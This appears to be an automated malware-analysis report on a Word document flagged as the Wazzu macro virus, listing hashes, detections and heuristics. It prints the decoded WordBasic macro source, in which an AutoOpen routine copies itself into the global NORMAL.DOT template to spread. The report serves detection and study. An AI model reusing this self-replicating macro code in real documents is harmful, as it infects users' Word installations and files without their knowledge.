Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 eeec86d9f46a40d8…

MALICIOUS

Office (OLE)

Size: 30.5 KB
Created: 1996-10-12 04:20:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: a221a7fd9ef50d606aedc5fd0af569ba
SHA-1: 60d2616bf300e3f22f60d1aec923793637b81cf0
SHA-256: eeec86d9f46a40d83de4a425498ac42581951ea3ba28cd3cd04424f74f792e1e
Risk Score: 220

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The file contains legacy WordBasic macro markers and a critical ClamAV detection for 'Doc.Trojan.Wazzu-47', indicating malicious intent. The AutoOpen macro attempts to copy itself to the global template 'NORMAL.DOT', suggesting a persistence mechanism. The macro's functionality is primarily focused on manipulating the document and its template, rather than directly downloading or executing external payloads.

Heuristics 4

  • ClamAV: Doc.Trojan.Wazzu-47 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Wazzu-47
  • Legacy WordBasic macro-virus markers (severity: high; rule: OLE_LEGACY_WORDBASIC_MACRO_VIRUS)
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected (severity: medium; 1 related finding; rule: OLE_VBA_MACROS)
    Document contains VBA macro code
  • AutoOpen macro (severity: high; rule: OLE_VBA_AUTOOPEN)
    AutoOpen macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1576 bytes
SHA-256: e41e429d36a191de2ca7bb97b7fb2cce181a625952a7f319d1e1aadc2babe070
Detection: ClamAV: Doc.Trojan.Wazzu-11
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "autoOpen"

Public Sub MAIN()
Attribute MAIN.VB_Description = "Runs AutoOpenScan"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.autoOpen.MAIN"
Dim fileMacro$
Dim globMacro$
Dim MacroFile$
    On Error GoTo -1: On Error GoTo errCaught
        
    WordBasic.FileSummaryInfo Update:=1
    Dim dlg As Object: Set dlg = WordBasic.DialogRecord.FileSummaryInfo(False)
    WordBasic.CurValues.FileSummaryInfo dlg

    fileMacro$ = dlg.Directory + "\" + dlg.FileName + ":autoOpen"
    globMacro$ = "Global:autoOpen"
    MacroFile$ = UCase(WordBasic.[Right$](WordBasic.[MacroFileName$](WordBasic.[MacroName$](0)), 10))

    If MacroFile$ = "NORMAL.DOT" Then
        WordBasic.MacroCopy globMacro$, fileMacro$
    Else
        WordBasic.MacroCopy fileMacro$, globMacro$
    End If

            WordBasic.FileSaveAs Format:=1

GoTo bye
errCaught:

bye:
    On Error GoTo -1: On Error GoTo 0

End Sub


Private Sub RndWord()
Dim wordNum
    WordBasic.FileSummaryInfo Update:=1
    Dim dlg As Object: Set dlg = WordBasic.DialogRecord.DocumentStatistics(False)
    WordBasic.CurValues.DocumentStatistics dlg

    wordNum = WordBasic.Int(Rnd() * WordBasic.Val(dlg.Words))
    WordBasic.StartOfDocument
    WordBasic.WordRight wordNum
End Sub